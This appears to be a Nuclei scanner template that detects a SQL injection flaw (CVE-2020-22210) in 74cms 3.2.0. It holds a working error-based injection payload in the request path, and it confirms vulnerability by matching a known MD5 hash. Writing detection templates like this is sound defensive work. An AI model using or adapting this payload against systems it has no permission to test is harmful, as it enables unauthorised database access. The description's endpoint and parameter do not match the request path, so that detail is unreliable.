id: CVE-2020-22210

info:
  author: princechaddha
  name: 74cms Sql Injection
  severity: high
  tags: 74cms,sqli
  description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-22210
    - https://github.com/blindkey/cve_like/issues/11
  classification:
    cve-id: CVE-2020-22210

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'

    matchers:
      - type: word
        words:
          - "e807f1fcf82d132f9bb018ca6738a19f"
        part: body

# Enhanced by mp on 2022/03/02
